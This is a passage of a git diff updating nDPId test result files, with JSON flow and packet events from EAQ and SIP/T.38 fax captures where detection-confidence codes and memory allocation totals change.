+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820950935,"flow_last_seen":1432821037152,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.68","src_port":34687,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820952931,"flow_last_seen":1432821039151,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.66","src_port":53354,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820964101,"flow_last_seen":1432821028791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.66","src_port":47346,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820958981,"flow_last_seen":1432821045604,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.67","src_port":39185,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820951932,"flow_last_seen":1432821038152,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.67","src_port":39221,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820949735,"flow_last_seen":1432821036045,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.67","src_port":51569,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1432820948562,"flow_last_seen":1432820948767,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":648,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious 
User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820949806,"flow_last_seen":1432821036155,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.66","src_port":41438,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820953931,"flow_last_seen":1432821040151,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.68","src_port":59959,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820969101,"flow_last_seen":1432821033791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.66","src_port":33356,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820956931,"flow_last_seen":1432821043151,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.68","src_port":47714,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820968101,"flow_last_seen":1432821032791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.67","src_port":60013,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820950865,"flow_last_seen":1432821036155,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.68","src_port":43641,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820949586,"flow_last_seen":1432821035895,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.138.146","src_port":52257,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820959095,"flow_last_seen":1432821045664,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.66","src_port":56128,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820963101,"flow_last_seen":1432821027791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.68","src_port":43934,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820957932,"flow_last_seen":1432821044555,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.66","src_port":43979,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820966101,"flow_last_seen":1432821030791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.67","src_port":50175,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820954931,"flow_last_seen":1432821041151,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.67","src_port":37985,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820970111,"flow_last_seen":1432821034791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.67","src_port":40058,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","packets-captured":197,"packets-processed":197,"total-skipped-flows":0,"total-l4-payload-len":13245,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":31,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":31,"total-idle-flows":31,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":189,"global_ts_msec":1432821045664} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 197/197 @@ -195,9 +195,9 @@ ~~ total active/idle flows...: 31/31 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5907091 bytes -~~ total memory freed........: 5907091 bytes -~~ total allocations/frees...: 118439/118439 +~~ total memory allocated....: 6040725 bytes +~~ total memory freed........: 6040725 bytes +~~ total allocations/frees...: 121201/121201 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 449 chars ~~ json string max len.......: 922 chars 
diff --git a/test/results/FAX-Call-t38-CA-TDM-SIP-FB-1.pcap.out b/test/results/FAX-Call-t38-CA-TDM-SIP-FB-1.pcap.out index 164c29ef3..12d6147e1 100644 --- a/test/results/FAX-Call-t38-CA-TDM-SIP-FB-1.pcap.out +++ b/test/results/FAX-Call-t38-CA-TDM-SIP-FB-1.pcap.out 
@@ -2,34 +2,34 @@ 00568{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1228468937630} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468937630,"flow_last_seen":1228468937630,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1228468937630,"l3_proto":"ip4","src_ip":"10.35.40.22","dst_ip":"10.23.1.42","src_port":2944,"dst_port":2944,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1228468937630,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1228468937630,"pkt":"ABgYesP\/AAFbAAaHCABFAABJQq5AAEARunwKIygWChcBKguAC4AANST+IS8xIDxpTVNTPgpUPTU1NTI4MjcxM3tDPS17QVY9RFMvMS81e0FUe019fX19"} 
-00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468937630,"flow_last_seen":1228468937630,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1228468937630,"l3_proto":"ip4","src_ip":"10.35.40.22","dst_ip":"10.23.1.42","src_port":2944,"dst_port":2944,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Megaco","breed":"Acceptable","category":"VoIP"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468937630,"flow_last_seen":1228468937630,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1228468937630,"l3_proto":"ip4","src_ip":"10.35.40.22","dst_ip":"10.23.1.42","src_port":2944,"dst_port":2944,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Megaco","breed":"Acceptable","category":"VoIP"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1228468937631,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1228468937631,"pkt":"ABgYesP\/AAFbAAaHCABFAABJQq9AAEARunsKIygWChcBKguAC4AANSUAIS8xIDxpTVNTPgpUPTU1NTI4MjcxNHtDPSp7QVY9RFMvMS81e0FUe019fX19"} 
00792{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1228468937633,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":292,"pkt_l4_len":258,"thread_ts_msec":1228468937633,"pkt":"AAFbAAaHABgYesP\/CABFaAEWVmoAAD4R54sKFwEqCiMoFguAC4ABAnAeIS8xIFsxMC4yMy4xLjQyXToyOTQ0IFAgPSA1NTUyODI3MTN7IEMgPSAtIHthdj1kcy8xLzUgIHsgbSB7IHRzIHsgc2k9aXYsYmYgPSAgT0ZGICxFUklfVEVSTUlORk8vbGF3X2NvbnY9b2ZmICwgRVJJX1RFUk1JTkZPL2Rldl9zdGF0ZT1Ob3JtICwgRVJJX1RFUk1JTkZPL2Rldl90eXBlPUNFRTEgfSAsc3QgPSAwIHsgbyB7IG1vPWluLFRETUMvRUM9T04gLCBURE1DL0dBSU49MCxyZyA9ICBPRkYgLHJ2ID0gIE9GRiAgfSAgfSAgfSAgfSB9fQ=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468958651,"flow_last_seen":1228468958651,"flow_idle_time":200000,"flow_min_l4_payload_len":877,"flow_max_l4_payload_len":877,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":877,"midstream":0,"thread_ts_msec":1228468958651,"l3_proto":"ip4","src_ip":"10.35.60.72","dst_ip":"10.35.60.100","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01628{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1228468958651,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":919,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":919,"pkt_l4_len":885,"thread_ts_msec":1228468958651,"pkt":"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"} 
-00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468958651,"flow_last_seen":1228468958651,"flow_idle_time":200000,"flow_min_l4_payload_len":877,"flow_max_l4_payload_len":877,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":877,"midstream":0,"thread_ts_msec":1228468958651,"l3_proto":"ip4","src_ip":"10.35.60.72","dst_ip":"10.35.60.100","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468958651,"flow_last_seen":1228468958651,"flow_idle_time":200000,"flow_min_l4_payload_len":877,"flow_max_l4_payload_len":877,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":877,"midstream":0,"thread_ts_msec":1228468958651,"l3_proto":"ip4","src_ip":"10.35.60.72","dst_ip":"10.35.60.100","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468958651,"flow_last_seen":1228468958651,"flow_idle_time":200000,"flow_min_l4_payload_len":877,"flow_max_l4_payload_len":877,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":877,"midstream":0,"thread_ts_msec":1228468958651,"l3_proto":"ip4","src_ip":"10.35.40.25","dst_ip":"10.35.40.200","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01628{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1228468958651,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":919,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":919,"pkt_l4_len":885,"thread_ts_msec":1228468958651,"pkt":"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"} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468958651,"flow_last_seen":1228468958651,"flow_idle_time":200000,"flow_min_l4_payload_len":877,"flow_max_l4_payload_len":877,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":877,"midstream":0,"thread_ts_msec":1228468958651,"l3_proto":"ip4","src_ip":"10.35.40.25","dst_ip":"10.35.40.200","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468958651,"flow_last_seen":1228468958651,"flow_idle_time":200000,"flow_min_l4_payload_len":877,"flow_max_l4_payload_len":877,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":877,"midstream":0,"thread_ts_msec":1228468958651,"l3_proto":"ip4","src_ip":"10.35.40.25","dst_ip":"10.35.40.200","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1228468958652,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":304,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":304,"pkt_l4_len":270,"thread_ts_msec":1228468958652,"pkt":"ABEKVkXQAAglAXLqCABFAAEiAABAAIARbNkKIzxkCiM8SBPEE8QBDiJNU0lQLzIuMCAxMDAgVHJ5aW5nDQpWaWE6IFNJUC8yLjAvVURQIDEwLjM1LjYwLjcyOjUwNjA7YnJhbmNoPXo5aEc0YksuaUlpSWlJLjBhMjMyODE5LmU5ZDRiZA0KVG86IDxzaXA6MDYxOTYzMTc3QGl0YWx0ZWwuaXQ7dXNlcj1waG9uZT4NCkZyb206IDxzaXA6dW5hdmFpbGFibGVAaG9zdHBvcnRpb24+O3RhZz0wMGU5ZDQ3OA0KQ2FsbC1JRDogMDBlOWQ0YTUwMGU5ZDQ4LTAwMTUtMDAwMS0wMDAwLTAwMDBAMTAuMzUuNDAuMjUNCkNTZXE6IDEgSU5WSVRFDQoNCg=="} 01628{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1228468958653,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":919,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":919,"pkt_l4_len":885,"thread_ts_msec":1228468958653,"pkt":"ABEKVkXRAAFbASs3CABFAAOJP55AAEARkp8KIygZCiMoyBPEE8QDdUDuSU5WSVRFIHNpcDowNjE5NjMxNzctaWtodXVlcDViaTEyM0AxMC4zNS42MC4xMDA6NTA2MDt0cmFuc3BvcnQ9dWRwIFNJUC8yLjANClZpYTogU0lQLzIuMC9VRFAgMTAuMzUuNjAuNzI6NTA2MDticmFuY2g9ejloRzRiSy5pSWlJaUkuMGEyMzI4MTkuZTlkNGJkDQpUbzogIDxzaXA6MDYxOTYzMTc3QGl0YWx0ZWwuaXQ7dXNlcj1waG9uZT4NCkZyb206IDxzaXA6dW5hdmFpbGFibGVAaG9zdHBvcnRpb24+O3RhZz0wMGU5ZDQ3OA0KQ2FsbC1JRDogMDBlOWQ0YTUwMGU5ZDQ4LTAwMTUtMDAwMS0wMDAwLTAwMDBAMTAuMzUuNDAuMjUNCkNTZXE6ICAxIElOVklURQ0KTWF4LUZvcndhcmRzOiA3MA0KQ29udGFjdDogPHNpcDphbm9ueW1vdXMuaUlpSWlJLjBhMjMyODE5LkAxMC4zNS42MC43Mj4NCkFsbG93OiBJTlZJVEUsIEFDSywgUFJBQ0ssIENBTkNFTCwgQllFLCBPUFRJT05TLCBNRVNTQUdFLCBOT1RJRlksIFVQREFURSwgUkVHSVNURVIsIElORk8sIFJFRkVSLCBTVUJTQ1JJQkUNCkFjY2VwdDogYXBwbGljYXRpb24vc2RwLCBhcHBsaWNhdGlvbi9pc3VwLCBhcHBsa
